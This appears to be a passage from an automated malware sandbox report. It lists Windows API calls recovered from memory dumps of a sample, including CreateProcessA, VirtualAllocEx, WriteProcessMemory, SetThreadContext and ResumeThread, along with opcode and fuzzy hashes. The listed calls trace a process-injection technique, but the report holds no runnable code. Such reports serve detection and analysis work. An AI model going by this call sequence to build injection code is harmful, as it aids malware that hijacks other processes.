                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: Thread$ContextResumeWow64
                                        • String ID:
                                        • API String ID: 1826235168-0

                                        Control-flow Graph

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0723BAD6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0723B6A8
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0723B6A8
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0723B788
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0723B788
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0723B4FE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0723B5C6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0723B5C6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0723F01D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0723F01D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325204539.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7230000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: V
                                        • API String ID: 0-1342839628
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode Fuzzy Hash: 368f619d66cbac441b6939ac35001bdafeb27a8d7d1ab0d74cca854e2bcd860d
                                        • Instruction Fuzzy Hash: 952106B4E15209DFCB48DFE9D5451AEBBF2EF89300F24D46A8405E7358E7345A41DB90
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5be76ed34a22008361c54eef6d382c9286050b24c2a25af902e455a56f2bc386
                                        • Instruction ID: 71e5c54f05b2e70a70ebbcf44bf278c5e575554dbe544aa14da3c127cf93d195
                                        • Opcode Fuzzy Hash: 5be76ed34a22008361c54eef6d382c9286050b24c2a25af902e455a56f2bc386
                                        • Instruction Fuzzy Hash: 69212A74E15209EFDB44DFA9D58559DBBF2EF89300F18C4AAD414AB365D730DA05CB40
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d12d9e45a1044d9398ad4efcf2eb960ac4676475a5f675d5acc9b1073a3ae73
                                        • Instruction ID: 299d3eefe1956c0350bb2399c12cb358d8e4b53f9e3c0bece9d978f8720c8860
                                        • Opcode Fuzzy Hash: 2d12d9e45a1044d9398ad4efcf2eb960ac4676475a5f675d5acc9b1073a3ae73
                                        • Instruction Fuzzy Hash: 9831F2B0C11218DFDB60DF99C694B8EBFF4EB09314F248469E408BB250C7B59845CF91
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2295d81fde3ebfe491ae505ba9e46ab61dca98d1a4bc837fec3ccd1ca7408c0
                                        • Instruction ID: eaf950f96e286c94b7124a2c4ece83b88794a0e33b7c4d43b0a8df32b1ce6bf8
                                        • Opcode Fuzzy Hash: c2295d81fde3ebfe491ae505ba9e46ab61dca98d1a4bc837fec3ccd1ca7408c0
                                        • Instruction Fuzzy Hash: 3E11E3B5A102465F8B16EFB988445BFBBFAEFC8260718453AE455D3340EF309A0287A1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 29e23a6d9f9cd72b9ebb1cd5fe701d27e05ba18e166ae002d7edc527f4326bbe
                                        • Instruction ID: 04643e02e4c9c6493005c6fa67e573a0e68c7e681eae7bc97e55a2eaac5475d3
                                        • Opcode Fuzzy Hash: 29e23a6d9f9cd72b9ebb1cd5fe701d27e05ba18e166ae002d7edc527f4326bbe
                                        • Instruction Fuzzy Hash: A8210774E20109EFDB04CFA9D585A9EFBF6EF89200F18C4A9D419A7364D730DA00DB00
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2200381098.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_b0d000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 421bbb7e653176d73fcd43267a5bf012158dbbd911715b07700e01723cddc7f1
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: B511B176504280CFCB16CF54D9C4B16BFB1FBA8314F24C6A9DD490B696C336D85ACBA2
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2200381098.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_b0d000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: fa5d7fae2c79d7029bcf2aac4506cd69f9bb4ea15466052fb6b5f35e38bf1ab9
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: 7A11DF72504240CFCB02CF44D5C4B1ABFB1FB94324F24C6A9D9090B296C33AE85ACBA2
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11411c43b5addc26c78d27ae13c71c17394172ba4856bbd19207040350f7f5d4
                                        • Instruction ID: 44333a61c2d56596fbca0fae0ac59caba16c2ae667ff11e24182541953dff0e0
                                        • Opcode Fuzzy Hash: 11411c43b5addc26c78d27ae13c71c17394172ba4856bbd19207040350f7f5d4
                                        • Instruction Fuzzy Hash: 4E1176B4E25349EFCF45CFA9D54419EBBB2AF89300F28C4BAD455E7258E7349A01CB50
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92d479782e1553030aaa5a86fc0b839fa761c6efda5767c114913ec0ba7d3e26
                                        • Instruction ID: abc24dfda055a690900a9581a9228d345b15e0331f7c43555a15d6d0419e20cf
                                        • Opcode Fuzzy Hash: 92d479782e1553030aaa5a86fc0b839fa761c6efda5767c114913ec0ba7d3e26
                                        • Instruction Fuzzy Hash: 5411C6F4138988DFCF41CF24F4896207FB8FB0A305FA494E5D6C586641D636C866C741
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 380bbc0593e6ecf7d784ec4f988d2303740a9401989fcd3f8f50e7de0b11ab04
                                        • Instruction ID: f1e6f4f044efce9827a94dd9bf03749402b34921b283706cab7445454b2946c7
                                        • Opcode Fuzzy Hash: 380bbc0593e6ecf7d784ec4f988d2303740a9401989fcd3f8f50e7de0b11ab04
                                        • Instruction Fuzzy Hash: DA1118B4E25309DFCF44CFA9D54559EBBB6BB89300F24C4BA8445A3214E7749A41CB50
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3342eb827684f9b2030d08d2040e578537cce893a705528be4ff0b4c6df38e96
                                        • Instruction ID: 78d32ac6ba3c95003e460d888bddfae60f232199a4eaf4e52c065b390049d717
                                        • Opcode Fuzzy Hash: 3342eb827684f9b2030d08d2040e578537cce893a705528be4ff0b4c6df38e96
                                        • Instruction Fuzzy Hash: 9F016DF4234888DFDF40CF58F4896257BB8FB4A306FA494E9D6CA86641DA76C8628741
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2200381098.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_b0d000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72ee0ee358c5ec7f44b8a0703a04be8364808874f25a0bd7dae2fcd2237acf5e
                                        • Instruction ID: 9d5a42c66cb97ff2a09d6d498d7517e19bd776cb11e8355d99d81fb361b310cc
                                        • Opcode Fuzzy Hash: 72ee0ee358c5ec7f44b8a0703a04be8364808874f25a0bd7dae2fcd2237acf5e
                                        • Instruction Fuzzy Hash: F901A7715043449AD7208A99CDC4B66FFD8EF55720F28C9AAED094A2C6C6799C40CA71
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2120cd35b77fd19fb9b5214bdb96332fdf1bf2bd7fc6718717ceaacb8abdb44
                                        • Instruction ID: 6e30cc10b0955d4a0c3d459384232f5502fb76d914675da41a448de26ebe77c1
                                        • Opcode Fuzzy Hash: b2120cd35b77fd19fb9b5214bdb96332fdf1bf2bd7fc6718717ceaacb8abdb44
                                        • Instruction Fuzzy Hash: B201867550524A9FCB01EF65D844C9EBF7DEF86350700819AE9459B312E730EE49CBB1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db560375aa001e5554902d75415fd697509f8ae38f7fb9afde358875c12318f4
                                        • Instruction ID: 726094befb33f1dbccc05ca632ab3c35b284a06b614b31dbf5f9dcce73e60205
                                        • Opcode Fuzzy Hash: db560375aa001e5554902d75415fd697509f8ae38f7fb9afde358875c12318f4
                                        • Instruction Fuzzy Hash: B80152B4E1010ACFCB40EF68C4549AEBBB1BF48700F2585AAD815EB351D7749942CF91
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 849ba4d8f2816d2c5525213e6adbcb686ea9f61a6a40390d14072d6525613bc5
                                        • Instruction ID: 2907ca227182a3c8c9f8cbbc91a058ca8eb8684df988d7a01aae5f9b665b71fd
                                        • Opcode Fuzzy Hash: 849ba4d8f2816d2c5525213e6adbcb686ea9f61a6a40390d14072d6525613bc5
                                        • Instruction Fuzzy Hash: 0E01AFB4C14249EFCF42EFE8D944ADDBFB0EF05311F1481AAE865D7211D6349A42CB61
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a5dfb1a56e09c247680ee7f7964c8a342feb0545621adf4e11b38d775f8c238d
                                        • Instruction ID: 6bb8a6a392a54e6a21988b4e8e810ea9fb62e1e523211902751b93a0436bc507
                                        • Opcode Fuzzy Hash: a5dfb1a56e09c247680ee7f7964c8a342feb0545621adf4e11b38d775f8c238d
                                        • Instruction Fuzzy Hash: 10012CB091021ADFDF14CF6AC5043EE7AF1EF49320F248525E864EA290E7754A40CFD1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7d85fefc1f5ee7357a2d71e283514d57119e7f8c4b4bab645673144d3cb6e3c
                                        • Instruction ID: 266c7107e55fd99c57dd4f7f2a64ff9e1a51d0ff066e14ce04e12183cc0151c0
                                        • Opcode Fuzzy Hash: b7d85fefc1f5ee7357a2d71e283514d57119e7f8c4b4bab645673144d3cb6e3c
                                        • Instruction Fuzzy Hash: 3F01C2B4540F14CFD724DF1AF689912BBF4FF8870174189AAD0CA87A65DB76A424CB44
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2200381098.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_b0d000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4dea4f3c265ecadfe5a394c98c0db36c4a840e5c500d42281b413f028f74a49f
                                        • Instruction ID: 6434a444b9c099a7922483bbd6d75e498374224fe6a7905c40c0230fbeca7720
                                        • Opcode Fuzzy Hash: 4dea4f3c265ecadfe5a394c98c0db36c4a840e5c500d42281b413f028f74a49f
                                        • Instruction Fuzzy Hash: DCF062714043449EE7208A16DC84B62FFE8EF55734F18C59AED484B2C6C279AC44CAB5
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1baf00eb033213894aec01fc6727f2669899a4a3ef66010cac10fbcc48941e4
                                        • Instruction ID: 44e5b258188293259412d6a50c50580b39b5e052569fd00ab486a56d42fbe463
                                        • Opcode Fuzzy Hash: b1baf00eb033213894aec01fc6727f2669899a4a3ef66010cac10fbcc48941e4
                                        • Instruction Fuzzy Hash: 58F06275610109AFCB00EF54D884C9EBB7DEF85351B008259E9056B310E730EE49CBB1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 206720401ca55026eb92297a0a21378758d01f965f830bda2502b65cc29e050f
                                        • Instruction ID: 7ea02149289b345d84aec4bb3eed44e7f6a55b2d5d66d54220fb5adc7f6e40a4
                                        • Opcode Fuzzy Hash: 206720401ca55026eb92297a0a21378758d01f965f830bda2502b65cc29e050f
                                        • Instruction Fuzzy Hash: F8F0E2357082941FD3059B6EDC94D6BBFEAEFCA66031580BAE548C7362DA308C01C7A0
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4be1f84c0f0c135a5cf65d6fd37e430fcf3838c80a2817a44bc881f7043d4b64
                                        • Instruction ID: 76bd830d2a7a0a4d386f4c0a743339997ad05a0bae656bf0976b823f6eaa0167
                                        • Opcode Fuzzy Hash: 4be1f84c0f0c135a5cf65d6fd37e430fcf3838c80a2817a44bc881f7043d4b64
                                        • Instruction Fuzzy Hash: D901E8B091021ADFDF14CF6AC5043EEBAF1AF49360F248229E824EA290E7744A40CBD0
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 853d58d0bd8f0f3f787f90e906355eca36cd3fdcc9aa5a93be6846430f45b0d8
                                        • Instruction ID: 54ddb86d56334b742923597c02fd4b4d0d83a9ed2e67591b164d08c58a9a88a8
                                        • Opcode Fuzzy Hash: 853d58d0bd8f0f3f787f90e906355eca36cd3fdcc9aa5a93be6846430f45b0d8
                                        • Instruction Fuzzy Hash: C9F0F6B4D05208AFCB16EFA8D8445EDFFB1FF49310F0480BAD84897251CB345954CB41
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8ffcc1b844ad17d95c1993c20aa644f079f73939877e5a8fa49239f7c254061
                                        • Instruction ID: 8d1a000b5bd6f8e04553a1e13b5ec2082c434e632d81f1b40436c534bd53968c
                                        • Opcode Fuzzy Hash: f8ffcc1b844ad17d95c1993c20aa644f079f73939877e5a8fa49239f7c254061
                                        • Instruction Fuzzy Hash: 79E039727001286F93049AAED884D6BBBEDEBCCA60361807AF508C7311DA319C0186A0
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d963a290955411d9318d15405efbfae4fed8694501cb94186bad51ff5432a511
                                        • Instruction ID: bb8fc64f425ef8ddf87ab8e750fbdb6b189cb43dbc161b5e59f8932f64488405
                                        • Opcode Fuzzy Hash: d963a290955411d9318d15405efbfae4fed8694501cb94186bad51ff5432a511
                                        • Instruction Fuzzy Hash: 05E01A7191A24A9FC702EF7898062DA7FB19B12201F5401A6D544872A2D7715A14C792
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07f36f4537c31e3d43f91b18b990faf3136d4426a5416f58de2b484e4c9c6af2
                                        • Instruction ID: 02f217b5bd77ad060bd076717d5bf9b0eea850f3f179dfc99f9a3c01b5d3eafe
                                        • Opcode Fuzzy Hash: 07f36f4537c31e3d43f91b18b990faf3136d4426a5416f58de2b484e4c9c6af2
                                        • Instruction Fuzzy Hash: F4F092B8D00208AFCB81EFA8D945A9DBBF4FF08311F1085AAE858A7321D7719A50DB50
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23032504bf3a68230f2c963b60d8a664c356b0b9022951a0ead31635fc572231
                                        • Instruction ID: 5cb06d531d7e96552ae2adf4bb9fda624e9d53a9d062a852d8141497242ef998
                                        • Opcode Fuzzy Hash: 23032504bf3a68230f2c963b60d8a664c356b0b9022951a0ead31635fc572231
                                        • Instruction Fuzzy Hash: 14E08C32008246EFCF03AB44DC41A857FA1FB12350B088096E1488E022D2338597DB92
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: